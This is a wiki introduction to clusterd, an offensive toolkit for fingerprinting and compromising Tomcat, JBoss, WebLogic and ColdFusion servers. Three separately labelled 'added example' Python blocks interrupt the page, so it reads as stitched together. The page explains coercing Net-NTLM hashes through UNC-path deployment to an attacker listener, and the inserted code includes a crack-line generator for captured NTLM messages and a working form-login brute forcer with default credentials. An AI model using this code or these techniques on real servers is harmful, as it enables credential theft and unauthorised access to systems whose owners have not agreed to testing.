
Introduction

bryan alexander edited this page Apr 16, 2014 · 4 revisions

clusterd is an application server attack toolkit written in Python. Currently supporting four different application servers, clusterd is capable of version-aware exploitation and reconnaissance using robust and reliable techniques.

The core issue this tool was born from is a lack of context during the exploitation phases. Penetration testers and security consultants alike know that the existing tools aren't very reliable, and that is primarily because they lack context: JBoss 5.1 is very different from 7.1. These differences require us to first inspect the context of the application server and then carry that information forward into the exploitation phases.

clusterd's first goal when executed is to fingerprint the remote system. This establishes the identity of the remote server and platform in order to determine the most accurate deployer and/or vulnerabilities to launch. A standard clusterd execution would look something like:

$ ./clusterd.py -i 192.168.1.102 -a tomcat

            clusterd/0.1 - clustered attack toolkit
            Supporting jboss, coldfusion, weblogic, tomcat

 [2014-02-08 12:50AM] Started at 2014-02-08 12:50AM
 [2014-02-08 12:50AM] Servers' OS hinted at windows
 [2014-02-08 12:50AM] Fingerprinting host '192.168.1.102'
 [2014-02-08 12:50AM] Server hinted at 'tomcat'
 [2014-02-08 12:50AM] Checking tomcat version 3.3 Tomcat...
 [2014-02-08 12:50AM] Checking tomcat version 3.3 Tomcat Admin...
 [2014-02-08 12:50AM] Checking tomcat version 4.0 Tomcat...
 [2014-02-08 12:50AM] Checking tomcat version 4.1 Tomcat...
 [2014-02-08 12:50AM] Checking tomcat version 4.1 Tomcat Manager...
 [2014-02-08 12:50AM] Checking tomcat version 4.0 Tomcat Manager...
 [2014-02-08 12:50AM] Checking tomcat version 5.5 Tomcat...
 [2014-02-08 12:50AM] Checking tomcat version 5.5 Tomcat Manager...
 [2014-02-08 12:50AM] Checking tomcat version 6.0 Tomcat...
 [2014-02-08 12:50AM] Checking tomcat version 6.0 Tomcat Manager...
 [2014-02-08 12:50AM] Checking tomcat version 7.0 Tomcat...
 [2014-02-08 12:50AM] Checking tomcat version 7.0 Tomcat Manager...
 [2014-02-08 12:50AM] Checking tomcat version 8.0 Tomcat...
 [2014-02-08 12:50AM] Checking tomcat version 8.0 Tomcat Manager...
 [2014-02-08 12:50AM] Matched 2 fingerprints for service tomcat
 [2014-02-08 12:50AM] 	Tomcat (version 5.5)
 [2014-02-08 12:50AM] 	Tomcat Manager (version 5.5)
 [2014-02-08 12:50AM] Fingerprinting completed.
 [2014-02-08 12:50AM] Finished at 2014-02-08 12:50AM

As shown, clusterd iterates over all fingerprints for the selected platform and reports the matches. If other flags were specified, these results would then be passed on for further processing. clusterd aims to be highly configurable in its fingerprinting and in its interactions with the remote system.
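To make the fingerprint-then-act flow concrete, here is an added example (not clusterd's own code) of a minimal version-aware fingerprint loop. Each fingerprint names a path to request and a pattern that pulls a version out of the response; the matched versions are tallied and mapped to a deployer path. The HTTP fetcher is injected so the example runs offline against constructed responses; the fingerprint paths, the "Apache Tomcat/x.y.z" banner pattern, and the version-to-deployer mapping are this example's assumptions, not clusterd's fingerprint set.

```python
"""
Added example, not clusterd's own code: a minimal version-aware fingerprint
loop. Fingerprints, sample responses and the deployer mapping are assumptions
made for this example.
"""
import re
from collections import Counter, namedtuple

Fingerprint = namedtuple("Fingerprint", "name path version_re")

# Tomcat's default error page carries an "Apache Tomcat/x.y.z" banner and the
# manager application lives under /manager. These are the example's assumed
# fingerprints, not clusterd's.
FINGERPRINTS = {
    "tomcat": [
        Fingerprint("Tomcat", "/clusterd-nonexistent", re.compile(r"Apache Tomcat/(\d+\.\d+)")),
        Fingerprint("Tomcat Manager", "/manager/html", re.compile(r"Apache Tomcat/(\d+\.\d+)")),
    ],
}

# Which deployment interface applies once the version is known (assumed
# mapping; Tomcat 7 moved the text interface under /manager/text).
DEPLOYERS = {
    "tomcat": {
        "5.5": "/manager/deploy",
        "6.0": "/manager/deploy",
        "7.0": "/manager/text/deploy",
        "8.0": "/manager/text/deploy",
    },
}

# Constructed responses standing in for a Tomcat 5.5 host: (status, headers, body).
SAMPLE_RESPONSES = {
    "/clusterd-nonexistent": (404, {"Server": "Apache-Coyote/1.1"},
                              "<h1>HTTP Status 404</h1><hr/><h3>Apache Tomcat/5.5.26</h3>"),
    "/manager/html": (401, {"Server": "Apache-Coyote/1.1",
                            "WWW-Authenticate": 'Basic realm="Tomcat Manager Application"'},
                      "<h1>HTTP Status 401</h1><hr/><h3>Apache Tomcat/5.5.26</h3>"),
}


def sample_fetch(path):
    """Offline stand-in for an HTTP GET; a real fetcher would use urllib or requests."""
    return SAMPLE_RESPONSES.get(path, (404, {}, ""))


def fingerprint(platform, fetch):
    """Return [(fingerprint name, version)] for every fingerprint that matched."""
    matches = []
    for fp in FINGERPRINTS[platform]:
        _status, headers, body = fetch(fp.path)
        # Search headers and body together; version banners show up in either.
        # A 401 on the manager path still counts: the error page names the version.
        haystack = "\n".join(f"{k}: {v}" for k, v in headers.items()) + "\n" + body
        m = fp.version_re.search(haystack)
        if m:
            matches.append((fp.name, m.group(1)))
    return matches


def select_version(matches):
    """Pick the version most fingerprints agree on; None if nothing matched."""
    if not matches:
        return None
    return Counter(version for _, version in matches).most_common(1)[0][0]


def choose_deployer(platform, matches):
    """Map the agreed version to the deployment interface for that version."""
    return DEPLOYERS[platform].get(select_version(matches))


if __name__ == "__main__":
    found = fingerprint("tomcat", sample_fetch)
    for name, version in found:
        print(f"Matched {name} (version {version})")
    print("deployer:", choose_deployer("tomcat", found))
```

The point of tallying versions rather than trusting the first match is that a single banner can be stale or spoofed; the deployer is only chosen once the version is known, which is the "context" the rest of the page argues for.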

You can find a brief video walkthrough of clusterd against a Tomcat server on YouTube, courtesy of awhitehttr.

Unique Features

clusterd is unique in many ways, not only in its approach to server exploitation, but in some of its core features. A brief rundown of some of these features is below:

  • The only framework aware of a platform's version

    clusterd's core is built around reconnaissance and exploitation of platforms based on the discovered version, which is then used to select deployers and auxiliary modules. JBoss, for example, was particularly difficult to deploy to because it was never clear which deployment method worked with which version. clusterd has been tested extensively against many major and minor versions of JBoss, so that version-specific deployments are stable and dependable.

  • JBoss 7.x deployments

    Currently, no other tool can deploy WARs to JBoss 7.x and up. The days of jmx-console and exposed JMXInvokerServlets are gone: 7.x exposes a new HTTP management API that speaks JSON. Deploying through it is still possible, and admittedly easier and more stable than before, but this interface always requires authentication, and no default credentials are enabled.

  • SMB hash retrieval

    clusterd features a unique method for forcing a remote application server to give up its NTLM challenge-response (the Net-NTLM hash of the account the server runs as). It does this by requesting deployment of a WAR from a UNC path, which the server then attempts to retrieve. Because of the way Windows resolves UNC paths, the host automatically negotiates an SMB connection to the attacker's listener and authenticates to it, divulging the challenge-response. The listener uses the fixed server challenge 1122334455667788, so NTLMv1 responses can be cracked with precomputed tables; NTLMv2 responses also carry a client nonce, so they still have to be cracked against a wordlist. This only works when the target runs on Windows and can reach the listener over SMB.

  • Password brute forcing

    Many services, such as WebLogic, don't use HTTP basic auth, so the generic basic-auth modes of brute forcers like Hydra or Medusa don't apply; each platform's form-based login has to be handled specifically. clusterd can brute force authentication for all supported platforms using a provided wordlist and username. It also ships with default credentials for these platforms, so it may guess credentials even when no wordlist is supplied.

  • Support for exotic application servers

    Because of clusterd's architecture, adding support for other servers is fairly trivial. clusterd currently supports Railo and WebLogic, two servers not supported by any other tool. More servers (see TODO) will be added in time.
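The SMB hash retrieval feature above ends with a listener receiving the Windows host's NTLM authentication. Here is an added example (not clusterd's own code) of the listener-side message handling: after the rogue server has sent the fixed challenge 1122334455667788, the host answers with an NTLMSSP AUTHENTICATE (Type 3) message, and this code parses it and emits the John/hashcat line ("netntlm" for NTLMv1, "netntlmv2" for NTLMv2). The SMB transport itself is not implemented here; the Type 3 message, user and domain names, and response bytes are constructed test data, not real credentials.

```python
"""
Added example, not clusterd's own code: parse an NTLMSSP AUTHENTICATE (Type 3)
message and emit a crack-format line using the fixed server challenge
1122334455667788. The builder exists only to produce constructed test input.
"""
import struct

FIXED_CHALLENGE = bytes.fromhex("1122334455667788")
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001
# Offsets of the six security-buffer descriptors in a Type 3 header.
_BUFFERS = (("lm", 12), ("nt", 20), ("domain", 28), ("user", 36),
            ("host", 44), ("session_key", 52))


def build_type3(user, domain, host, lm_resp, nt_resp, unicode=True):
    """Construct a Type 3 message (used here only to produce test input)."""
    enc = "utf-16-le" if unicode else "latin-1"
    flags = NTLMSSP_NEGOTIATE_UNICODE if unicode else 0
    parts = [lm_resp, nt_resp, domain.encode(enc), user.encode(enc), host.encode(enc), b""]
    header = bytearray(b"NTLMSSP\x00" + struct.pack("<I", 3))
    payload = b""
    for part in parts:
        # Security buffer: u16 length, u16 max length, u32 offset from message start.
        header += struct.pack("<HHI", len(part), len(part), 64 + len(payload))
        payload += part
    header += struct.pack("<I", flags)  # header is exactly 64 bytes
    return bytes(header) + payload


def _read_buffer(msg, off):
    """Resolve one security buffer, refusing offsets that leave the message."""
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, off)
    if offset + length > len(msg):
        raise ValueError("security buffer points outside message")
    return msg[offset:offset + length]


def parse_type3(msg):
    """Return user, domain, host, the two responses and the detected NTLM version."""
    if len(msg) < 64 or msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLMSSP AUTHENTICATE message")
    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "latin-1"
    raw = {name: _read_buffer(msg, off) for name, off in _BUFFERS}
    nt = raw["nt"]
    return {
        "user": raw["user"].decode(enc),
        "domain": raw["domain"].decode(enc),
        "host": raw["host"].decode(enc),
        "lm": raw["lm"],
        "nt": nt,
        # An NTLMv1 NT response is exactly 24 bytes; NTLMv2 is a 16-byte HMAC plus blob.
        "version": "NTLMv1" if len(nt) == 24 else "NTLMv2",
    }


def to_crack_line(msg, challenge=FIXED_CHALLENGE):
    """hashcat -m 5500 / john netntlm (v1) or hashcat -m 5600 / john netntlmv2 (v2)."""
    p = parse_type3(msg)
    if p["version"] == "NTLMv1":
        return f'{p["user"]}::{p["domain"]}:{p["lm"].hex()}:{p["nt"].hex()}:{challenge.hex()}'
    return f'{p["user"]}::{p["domain"]}:{challenge.hex()}:{p["nt"][:16].hex()}:{p["nt"][16:].hex()}'


if __name__ == "__main__":
    # Constructed sample: dummy response bytes, not a real capture.
    sample = build_type3("svc_tomcat", "WEBSRV", "WEBSRV01", bytes(24), bytes(range(24)))
    print(to_crack_line(sample))
```

The version check matters for the fixed-challenge trick: with NTLMv1 the 24-byte NT response depends only on the password hash and the server challenge, so a constant challenge lets precomputed tables recover the hash; with NTLMv2 the client adds its own nonce and timestamp, so the line is still correct but has to be attacked with a wordlist.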
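The password brute forcing feature above notes that platforms like WebLogic use form-based rather than basic authentication. The following added example (not clusterd's own code) shows what that means in practice: the login is a POST of form fields, and success is judged from where the server redirects, not from an HTTP 401. The `/console/j_security_check` path with `j_username`/`j_password` fields is the standard Java EE form-login convention that the WebLogic console uses; the target here is a constructed stand-in server, and its `LoginForm.jsp` redirect, the default-credential list and the valid credential are all assumptions for this example.

```python
"""
Added example, not clusterd's own code: brute forcing a form-based login
against a constructed stand-in for a WebLogic console. Credentials, the
redirect targets and the default list are made-up test data.
"""
import http.client
import threading
import urllib.parse
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Assumed valid credential for the stand-in server (test data only).
VALID = ("weblogic", "Welcome1")
# Assumed default-credential list of the kind a tool ships with.
DEFAULT_CREDS = [("weblogic", "weblogic"), ("weblogic", "weblogic1"),
                 ("system", "password"), ("weblogic", "Welcome1")]


class FakeConsole(BaseHTTPRequestHandler):
    """Stand-in for a form-auth console: 302 to the app on success, back to the form on failure."""

    def log_message(self, *args):  # keep request logging off stderr
        pass

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        creds = (form.get("j_username", [""])[0], form.get("j_password", [""])[0])
        target = "/console" if creds == VALID else "/console/login/LoginForm.jsp?error=1"
        self.send_response(302)
        self.send_header("Location", target)
        self.end_headers()


def start_server():
    """Start the stand-in console on a free loopback port; returns the server."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), FakeConsole)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def try_login(host, port, user, password, path="/console/j_security_check"):
    """POST the form fields and judge success from the redirect target."""
    body = urllib.parse.urlencode({"j_username": user, "j_password": password})
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("POST", path, body, {"Content-Type": "application/x-www-form-urlencoded"})
    resp = conn.getresponse()
    resp.read()
    location = resp.getheader("Location", "")
    conn.close()
    # Form auth answers 302 either way; success is a redirect away from the login form.
    return resp.status == 302 and "LoginForm" not in location


def brute_force(host, port, username, wordlist, defaults=DEFAULT_CREDS):
    """Try platform defaults first, then the supplied username with each wordlist entry."""
    for user, pw in list(defaults) + [(username, pw) for pw in wordlist]:
        if try_login(host, port, user, pw):
            return (user, pw)
    return None


if __name__ == "__main__":
    srv = start_server()
    print(brute_force("127.0.0.1", srv.server_port, "weblogic", ["password", "Welcome1"]))
    srv.shutdown()
```

Against a real console the success condition should be confirmed by following the redirect and checking for an authenticated page, since a misconfigured server can redirect everything to the same place; the redirect check is the fast first pass.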
